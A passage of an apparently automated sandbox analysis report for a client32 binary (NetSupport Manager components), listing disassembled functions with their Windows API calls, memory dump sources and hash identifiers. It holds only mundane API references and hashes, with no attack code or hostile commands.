                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EnableErrorExitItemLastMessageProcessWindowwsprintf
                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                                                                                    • API String ID: 1136984157-1986719024
                                                                                                                                                    • Opcode ID: bd8169d8b1d2f1da16aa56a8743fe70e232c658d653b50b5f908e1dbd2e13666
                                                                                                                                                    • Instruction ID: 36c1a6ee6805b1b90e48090b7f41ce0c53d42d7852bf61e64861d4a713bbcb04
                                                                                                                                                    • Opcode Fuzzy Hash: bd8169d8b1d2f1da16aa56a8743fe70e232c658d653b50b5f908e1dbd2e13666
                                                                                                                                                    • Instruction Fuzzy Hash: E3E0867950022DBFC7149E91DC85EAAF35CEB44269F00C135F96656644D674E84087A4
                                                                                                                                                    Function 11027530 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23sleepthreadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EnumExitSleepThreadWindows
                                                                                                                                                    • String ID: TapiFix
                                                                                                                                                    • API String ID: 1804117399-2824097521
                                                                                                                                                    • Opcode ID: 9b936a382379f1639e294998df4fda084f6c97918e753868017fe61e0b06262c
                                                                                                                                                    • Instruction ID: 0d22cb111dc1a1c74f2ece42ee292e751dc76676b098746739fa73436add6467
                                                                                                                                                    • Opcode Fuzzy Hash: 9b936a382379f1639e294998df4fda084f6c97918e753868017fe61e0b06262c
                                                                                                                                                    • Instruction Fuzzy Hash: C7E04838A4167CAFE615DB918D84F56BA989B5535CF810030E4351664597B07940C7A9
                                                                                                                                                    Function 1101D410 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 1101D43F
                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 1101D446
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorExitItemLastMessageProcessShowWindowwsprintf
                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                                                                                    • API String ID: 1319256379-1986719024
                                                                                                                                                    • Opcode ID: 8377f77b347f7a331b9e274c23780b90952fd8225b6a3357c05bbe4f1f66010c
                                                                                                                                                    • Instruction ID: e0f7042720cd81023d22bad3d6b473d4ff1ed87f82d399384176be7cf1b5ebc2
                                                                                                                                                    • Opcode Fuzzy Hash: 8377f77b347f7a331b9e274c23780b90952fd8225b6a3357c05bbe4f1f66010c
                                                                                                                                                    • Instruction Fuzzy Hash: D3E04F7594032DBBC7049A95DC89EEAB39CEB54229F008025F92556600E670A84087A0
                                                                                                                                                    Function 11165643 Relevance: 6.1, APIs: 4, Instructions: 130COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2782032738-0
                                                                                                                                                    • Opcode ID: 415f7824d5181701451102ec2043120fcf40d14aa730d168d4873098ed8d68d1
                                                                                                                                                    • Instruction ID: 2bbfea60a2a12786820c2de27e6caf434d82015e81e2d2deebce7f4ca3d92771
                                                                                                                                                    • Opcode Fuzzy Hash: 415f7824d5181701451102ec2043120fcf40d14aa730d168d4873098ed8d68d1
                                                                                                                                                    • Instruction Fuzzy Hash: 7541F635A00B05DFDB558F65D94059EFBBEEF803A4F254128D45597240E7F6ED60CB40
                                                                                                                                                    Function 11067900 Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 1106791B
                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 11067957
                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 110679AA
                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 110679EB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BeepMessage
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2359647504-0
                                                                                                                                                    • Opcode ID: 7f1ecbc06fcb22de26d86451293ac8fe5d9409e3203d5f6e821324ac06cc55b8
                                                                                                                                                    • Instruction ID: 4a014cbc1c5237b7f0567ced4e31e585fd70e1907f22ab32dda50b08ea234cb0
                                                                                                                                                    • Opcode Fuzzy Hash: 7f1ecbc06fcb22de26d86451293ac8fe5d9409e3203d5f6e821324ac06cc55b8
                                                                                                                                                    • Instruction Fuzzy Hash: 5831C275640610ABE728CF54C882F77B3F8EF84B10F01859AF95687685E3B5E950C3B1
                                                                                                                                                    Function 11049130 Relevance: 6.1, APIs: 4, Instructions: 112windowtimeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 11040700: IsWindow.USER32(?), ref: 11040720
                                                                                                                                                      • Part of subcall function 11040700: GetClassNameA.USER32(?,?,00000040), ref: 11040731
                                                                                                                                                    • _malloc.LIBCMT ref: 110491DD
                                                                                                                                                    • _memmove.LIBCMT ref: 110491EA
                                                                                                                                                    • SendMessageTimeoutA.USER32(?,0000004A,000A0036,?,00000002,00001388,?), ref: 11049224
                                                                                                                                                    • _free.LIBCMT ref: 1104922B
                                                                                                                                                      • Part of subcall function 11048FE0: wsprintfA.USER32 ref: 11049013
                                                                                                                                                      • Part of subcall function 11048FE0: WaitForInputIdle.USER32(?,00002710), ref: 11049099
                                                                                                                                                      • Part of subcall function 11048FE0: CloseHandle.KERNEL32(?), ref: 110490AC
                                                                                                                                                      • Part of subcall function 11048FE0: CloseHandle.KERNEL32(?), ref: 110490B5
                                                                                                                                                      • Part of subcall function 11048FE0: Sleep.KERNEL32(00000014), ref: 110490D1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandle$ClassIdleInputMessageNameSendSleepTimeoutWaitWindow_free_malloc_memmovewsprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 176360892-0
                                                                                                                                                    • Opcode ID: ff22a9ddfc9956f02424ec2608c6f13a06eca4d3def8f93d8689db34ce88e07c
                                                                                                                                                    • Instruction ID: d41a6b91d128f2eeea48cc74d118894cce712679c930bdd2d1ac7c58a8e7d684
                                                                                                                                                    • Opcode Fuzzy Hash: ff22a9ddfc9956f02424ec2608c6f13a06eca4d3def8f93d8689db34ce88e07c
                                                                                                                                                    • Instruction Fuzzy Hash: 60316075E0061AABDB04DF94CD81BEEB3B8FF48718F104179E915A7684E731AE05CBA1
                                                                                                                                                    Function 6CA8CC90 Relevance: 6.1, APIs: 4, Instructions: 104COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6CA9DBD0: _malloc.LIBCMT ref: 6CA9DBE9
                                                                                                                                                      • Part of subcall function 6CA9DBD0: wsprintfA.USER32 ref: 6CA9DC04
                                                                                                                                                      • Part of subcall function 6CA9DBD0: _memset.LIBCMT ref: 6CA9DC27
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 6CA8CCCD
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 6CA8CCE2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1338273076-0
                                                                                                                                                    • Opcode ID: b172729f3f23dca40d738fca8b95193ad4aa528bd4f6c1796e62af2aa657e95f
                                                                                                                                                    • Instruction ID: 13c9db7bf374a68fd740e7fafec47c67d3e3cf02e380e0eaae4160e28e00693f
                                                                                                                                                    • Opcode Fuzzy Hash: b172729f3f23dca40d738fca8b95193ad4aa528bd4f6c1796e62af2aa657e95f
                                                                                                                                                    • Instruction Fuzzy Hash: 133150B59107089FC718DF59D54189BF7F8FF48204B148A6ED85A97B20EB70ED48CB91
                                                                                                                                                    Function 110297F0 Relevance: 6.1, APIs: 4, Instructions: 104sleepthreadwindowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateThread.KERNEL32(00000000,00001000,11027690,00000000,00000000,111EE468), ref: 11029813
                                                                                                                                                    • Sleep.KERNEL32(00000032,?,1102B0F3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 11029832
                                                                                                                                                    • PostThreadMessageA.USER32(00000000,00000500,00000000,00000000), ref: 11029854
                                                                                                                                                    • Sleep.KERNEL32(00000032,?,1102B0F3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 1102985C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: SleepThread$CreateMessagePost
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3347742789-0
                                                                                                                                                    • Opcode ID: fda338b6a51c78fe6c2f886b68065117b2ed91385ddfdaae507fd395cc0aabb8
                                                                                                                                                    • Instruction ID: 2ae3116f5df8233203c0b5b7c047d092e18a9fbb085bfb1a1d8cc4b180184980
                                                                                                                                                    • Opcode Fuzzy Hash: fda338b6a51c78fe6c2f886b68065117b2ed91385ddfdaae507fd395cc0aabb8
                                                                                                                                                    • Instruction Fuzzy Hash: F331C576E43232EBE212DBD9CC80FB6B798A745B68F514135F928972C8D2706841CFD0
                                                                                                                                                    Function 11179775 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 111797A9
                                                                                                                                                    • __isleadbyte_l.LIBCMT ref: 111797DC
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,50036AD0,00BFBBEF,00000000,?,?,?,1117A3D8,00000109,00BFBBEF,00000003), ref: 1117980D
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,1117A3D8,00000109,00BFBBEF,00000003), ref: 1117987B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3058430110-0
                                                                                                                                                    • Opcode ID: 8a143442f0c1ddc808179669c8bda0f547e04561d024046af250b3c99ddd2ce0
                                                                                                                                                    • Instruction ID: dd7da2bd4d1e27f38930cbdbffb8ca2b0741d821671db88b966082c1cf8912a5
                                                                                                                                                    • Opcode Fuzzy Hash: 8a143442f0c1ddc808179669c8bda0f547e04561d024046af250b3c99ddd2ce0
                                                                                                                                                    • Instruction Fuzzy Hash: 1331AE31A0029EEFEB01DF64C9849AEFFA6EF01330F1585A9E4648B290F730D954CB51
                                                                                                                                                    Function 110B3700 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • EnterCriticalSection.KERNEL32(0000002C,1EF76653,?,?,?,00000000,?,Function_0018B2A8,000000FF,?,1103DE10,?,?,?,00000000), ref: 110B372F
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(0000002C,?,00000000,?,Function_0018B2A8,000000FF,?,1103DE10,?,?,?,00000000), ref: 110B376F
                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 110B37EA
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(0000002C), ref: 110B37F1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
